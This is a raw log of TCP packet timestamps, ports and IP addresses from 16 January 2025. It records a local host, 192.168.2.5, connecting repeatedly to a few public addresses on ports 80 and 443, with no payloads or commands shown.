Jan 16, 2025 08:25:27.124464035 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.124532938 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.124687910 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.124758959 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.124969959 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.125037909 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.125215054 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.125277996 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.125395060 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.125463963 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.128324032 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.128397942 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.128576994 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.128645897 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.128803968 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.128869057 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.128958941 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.129024029 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.129137039 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.129199028 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.207524061 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.207706928 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.207715988 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.207745075 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.207766056 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.207798958 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.207978964 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.208043098 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.208286047 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.208359957 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.208522081 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.208585978 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.208791018 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.208858967 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.209002972 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.209069014 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.209305048 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.209372044 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.209537983 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.209626913 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.209770918 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.209851027 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.210042000 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.210110903 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.210273981 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.210345030 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.210552931 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.210619926 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.210810900 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.210875988 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.211005926 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.211077929 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.211224079 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.211287975 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.211499929 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.211601973 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.211997986 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.212106943 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.332303047 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.332432032 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.332499981 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.332534075 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.332570076 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.332587004 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.332643032 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.332695007 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.332945108 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.332992077 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.333132029 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.333201885 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.333240986 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.333307981 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.333539009 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.333597898 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.333673954 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.333725929 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.333832979 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.333897114 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.333904982 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.333950043 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.334096909 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.334131002 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:27.334162951 CET	49715	443	192.168.2.5	166.62.27.188
Jan 16, 2025 08:25:27.334178925 CET	443	49715	166.62.27.188	192.168.2.5
Jan 16, 2025 08:25:32.950519085 CET	49758	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:32.955437899 CET	80	49758	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:32.955764055 CET	49758	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:32.956012011 CET	49758	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:32.960822105 CET	80	49758	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:33.648559093 CET	80	49758	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:33.653177023 CET	49758	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:33.657972097 CET	80	49758	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:33.865679979 CET	80	49758	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:34.041599989 CET	49758	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:34.373622894 CET	49772	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:34.373645067 CET	443	49772	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:34.373785973 CET	49772	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:34.391374111 CET	49772	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:34.391390085 CET	443	49772	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:34.856163979 CET	443	49772	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:34.856340885 CET	49772	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:34.858489990 CET	49772	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:34.858510017 CET	443	49772	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:34.859047890 CET	443	49772	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:34.919843912 CET	49772	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:34.963335991 CET	443	49772	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:35.028359890 CET	443	49772	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:35.028440952 CET	443	49772	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:35.028496027 CET	49772	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:35.062520981 CET	49772	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:35.070605993 CET	49758	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:35.075510025 CET	80	49758	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:35.283335924 CET	80	49758	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:35.286951065 CET	49779	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:35.287003994 CET	443	49779	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:35.287199974 CET	49779	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:35.287480116 CET	49779	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:35.287517071 CET	443	49779	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:35.338509083 CET	49758	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:35.759896040 CET	443	49779	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:35.778173923 CET	49779	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:35.778191090 CET	443	49779	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:35.893578053 CET	443	49779	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:35.893634081 CET	443	49779	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:35.893732071 CET	49779	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:35.894337893 CET	49779	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:35.898394108 CET	49758	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:35.899363041 CET	49785	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:35.903397083 CET	80	49758	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:35.903460026 CET	49758	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:35.904195070 CET	80	49785	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:35.904273033 CET	49785	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:35.904366970 CET	49785	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:35.909976959 CET	80	49785	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:37.575536013 CET	80	49785	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:37.577126980 CET	49792	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:37.577188015 CET	443	49792	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:37.577271938 CET	49792	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:37.577603102 CET	49792	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:37.577625990 CET	443	49792	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:37.619409084 CET	49785	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:38.031176090 CET	443	49792	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:38.033467054 CET	49792	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:38.033492088 CET	443	49792	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:38.164635897 CET	443	49792	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:38.164733887 CET	443	49792	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:38.164783955 CET	49792	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:38.165149927 CET	49792	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:38.169047117 CET	49785	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:38.170159101 CET	49796	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:38.174093008 CET	80	49785	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:38.174150944 CET	49785	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:38.174963951 CET	80	49796	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:38.175029039 CET	49796	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:38.175128937 CET	49796	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:38.179887056 CET	80	49796	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:38.865207911 CET	80	49796	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:38.866894960 CET	49801	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:38.866924047 CET	443	49801	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:38.867188931 CET	49801	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:38.867257118 CET	49801	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:38.867264986 CET	443	49801	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:38.916287899 CET	49796	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:39.350148916 CET	443	49801	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:39.352704048 CET	49801	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:39.352721930 CET	443	49801	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:39.487370014 CET	443	49801	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:39.487437963 CET	443	49801	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:39.487569094 CET	49801	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:39.488027096 CET	49801	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:39.495853901 CET	49807	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:39.500781059 CET	80	49807	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:39.500874043 CET	49807	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:39.500993967 CET	49807	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:39.505871058 CET	80	49807	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:40.193797112 CET	80	49807	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:40.195173979 CET	49814	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:40.195218086 CET	443	49814	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:40.195301056 CET	49814	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:40.195563078 CET	49814	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:40.195579052 CET	443	49814	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:40.244483948 CET	49807	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:40.651751041 CET	443	49814	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:40.653958082 CET	49814	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:40.653978109 CET	443	49814	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:40.797590971 CET	443	49814	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:40.797668934 CET	443	49814	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:40.797725916 CET	49814	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:40.798922062 CET	49814	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:40.838123083 CET	49807	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:40.840903997 CET	49820	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:40.843148947 CET	80	49807	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:40.843245029 CET	49807	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:40.845751047 CET	80	49820	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:40.845830917 CET	49820	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:40.846149921 CET	49820	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:40.850996971 CET	80	49820	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:41.528443098 CET	80	49820	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:41.555095911 CET	49827	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:41.555116892 CET	443	49827	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:41.555609941 CET	49827	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:41.556075096 CET	49827	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:41.556092024 CET	443	49827	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:41.572561979 CET	49820	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:42.018764973 CET	443	49827	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:42.021197081 CET	49827	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:42.021240950 CET	443	49827	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:42.151396036 CET	443	49827	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:42.151456118 CET	443	49827	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:42.151505947 CET	49827	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:42.171283007 CET	49827	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:42.192491055 CET	49820	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:42.193517923 CET	49833	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:42.197478056 CET	80	49820	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:42.197576046 CET	49820	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:42.198370934 CET	80	49833	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:42.198484898 CET	49833	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:42.202163935 CET	49833	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:42.207051992 CET	80	49833	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:42.874547958 CET	80	49833	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:42.924119949 CET	49833	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:42.958626032 CET	49835	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:42.958688021 CET	443	49835	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:42.958774090 CET	49835	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:42.959233999 CET	49835	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:42.959254026 CET	443	49835	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:43.412098885 CET	443	49835	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:43.414902925 CET	49835	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:43.414931059 CET	443	49835	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:43.540642977 CET	443	49835	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:43.540721893 CET	443	49835	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:43.540791035 CET	49835	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:43.541338921 CET	49835	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:43.548819065 CET	49833	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:43.551527977 CET	49840	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:43.553833961 CET	80	49833	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:43.553900003 CET	49833	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:43.556484938 CET	80	49840	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:43.556555986 CET	49840	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:43.556695938 CET	49840	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:43.561448097 CET	80	49840	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:44.239105940 CET	80	49840	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:44.240432024 CET	49842	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:44.240458012 CET	443	49842	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:44.240533113 CET	49842	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:44.240760088 CET	49842	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:44.240772009 CET	443	49842	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:44.284039021 CET	49840	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:44.713946104 CET	443	49842	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:44.717091084 CET	49842	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:44.717137098 CET	443	49842	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:44.858808041 CET	443	49842	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:44.858885050 CET	443	49842	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:44.858980894 CET	49842	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:44.859406948 CET	49842	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:44.904515028 CET	49840	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:44.905292988 CET	49847	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:44.909554005 CET	80	49840	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:44.910125017 CET	80	49847	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:44.910206079 CET	49840	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:44.910247087 CET	49847	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:44.910378933 CET	49847	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:44.915160894 CET	80	49847	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:46.598145008 CET	80	49847	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:46.599406004 CET	49796	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:46.601043940 CET	49858	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:46.601075888 CET	443	49858	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:46.601187944 CET	49858	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:46.601489067 CET	49858	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:46.601502895 CET	443	49858	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:46.658421993 CET	49847	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:47.037081957 CET	49863	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:47.041990042 CET	80	49863	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:47.042131901 CET	49863	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:47.042229891 CET	49863	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:47.047015905 CET	80	49863	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:47.085202932 CET	443	49858	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:47.086889029 CET	49858	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:47.086903095 CET	443	49858	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:47.236701965 CET	443	49858	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:47.236867905 CET	443	49858	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:47.236941099 CET	49858	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:47.237483978 CET	49858	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:47.296531916 CET	49847	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:47.301825047 CET	80	49847	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:47.301891088 CET	49847	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:47.304231882 CET	49865	443	192.168.2.5	149.154.167.220
Jan 16, 2025 08:25:47.304275990 CET	443	49865	149.154.167.220	192.168.2.5
Jan 16, 2025 08:25:47.304347038 CET	49865	443	192.168.2.5	149.154.167.220
Jan 16, 2025 08:25:47.304785967 CET	49865	443	192.168.2.5	149.154.167.220
Jan 16, 2025 08:25:47.304802895 CET	443	49865	149.154.167.220	192.168.2.5
Jan 16, 2025 08:25:47.715920925 CET	80	49863	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:47.735799074 CET	49863	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:47.740633965 CET	80	49863	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:47.923022985 CET	443	49865	149.154.167.220	192.168.2.5
Jan 16, 2025 08:25:47.923099041 CET	49865	443	192.168.2.5	149.154.167.220
Jan 16, 2025 08:25:47.925170898 CET	49865	443	192.168.2.5	149.154.167.220
Jan 16, 2025 08:25:47.925180912 CET	443	49865	149.154.167.220	192.168.2.5
Jan 16, 2025 08:25:47.925426960 CET	443	49865	149.154.167.220	192.168.2.5
Jan 16, 2025 08:25:47.926568031 CET	49865	443	192.168.2.5	149.154.167.220
Jan 16, 2025 08:25:47.944468021 CET	80	49863	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:47.971332073 CET	443	49865	149.154.167.220	192.168.2.5
Jan 16, 2025 08:25:48.129975080 CET	49863	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:48.166974068 CET	443	49865	149.154.167.220	192.168.2.5
Jan 16, 2025 08:25:48.167150021 CET	443	49865	149.154.167.220	192.168.2.5
Jan 16, 2025 08:25:48.167267084 CET	49865	443	192.168.2.5	149.154.167.220
Jan 16, 2025 08:25:48.175527096 CET	49865	443	192.168.2.5	149.154.167.220
Jan 16, 2025 08:25:48.396177053 CET	49872	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:48.396213055 CET	443	49872	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:48.396286964 CET	49872	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:48.407919884 CET	49872	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:48.407938004 CET	443	49872	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:48.862901926 CET	443	49872	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:48.862974882 CET	49872	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:48.864859104 CET	49872	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:48.864866018 CET	443	49872	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:48.865128994 CET	443	49872	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:48.911163092 CET	49872	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:48.920356035 CET	49872	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:48.967344999 CET	443	49872	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:49.024864912 CET	443	49872	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:49.024931908 CET	443	49872	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:49.025183916 CET	49872	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:49.027626991 CET	49872	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:49.032938004 CET	49863	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:49.038955927 CET	80	49863	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:49.245121956 CET	80	49863	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:49.247042894 CET	49878	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:49.247057915 CET	443	49878	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:49.247158051 CET	49878	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:49.247430086 CET	49878	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:49.247445107 CET	443	49878	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:49.286279917 CET	49863	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:49.732872963 CET	443	49878	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:49.734469891 CET	49878	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:49.734508991 CET	443	49878	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:49.858892918 CET	443	49878	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:49.859025955 CET	443	49878	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:49.859217882 CET	49878	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:49.859441042 CET	49878	443	192.168.2.5	104.21.80.1
